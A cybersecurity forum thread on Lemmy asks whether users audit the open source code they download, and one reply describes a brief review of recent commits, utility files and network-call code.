this post was submitted on 29 May 2025
25 points (100.0% liked)

Cybersecurity

7419 readers
7 users here now

c/cybersecurity is a community centered on the cybersecurity and information security profession. You can come here to discuss news, post something interesting, or just chat with others.

THE RULES

Instance Rules

Community Rules

If you ask someone to hack your "friends" socials you're just going to get banned so don't do that.

Learn about hacking

Hack the Box

Try Hack Me

Pico Capture the flag

Other security-related communities !databreaches@lemmy.zip !netsec@lemmy.world !securitynews@infosec.pub !cybersecurity@infosec.pub !pulse_of_truth@infosec.pub

Notable mention to !cybersecuritymemes@lemmy.world

founded 2 years ago
MODERATORS
kid@sh.itjust.works
Lanky_Pomegranate530@midwest.social
25
Do you actually audit open source projects you download? (lemmy.ml)
submitted 1 week ago by OhVenus_Baby@lemmy.ml to c/cybersecurity@sh.itjust.works
9 comments fedilink hide all child comments
 

cross-posted from: https://lemmy.ml/post/30846707

cross-posted from: https://lemmy.ml/post/30846701

The question is simple. I wanted to get a general consensus on if people actually audit the code that they use from FOSS or open source software or apps.

Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?

Let's hear it!

you are viewing a single comment's thread
view the rest of the comments
[–] Lazycog@sopuli.xyz 5 points 1 week ago

If it's something that is not very popular/known I do actually look at the code, but never all of it.

I check:

  • most recent commits
  • for something that might have been hidden before one of the releases
  • deeper into utility files
  • look for suspicious patterns in code that might be trying to hide something. Mostly for/in external network call related code

This is of course very superficial and in general I try to avoid obscure projects that are not popular and well known.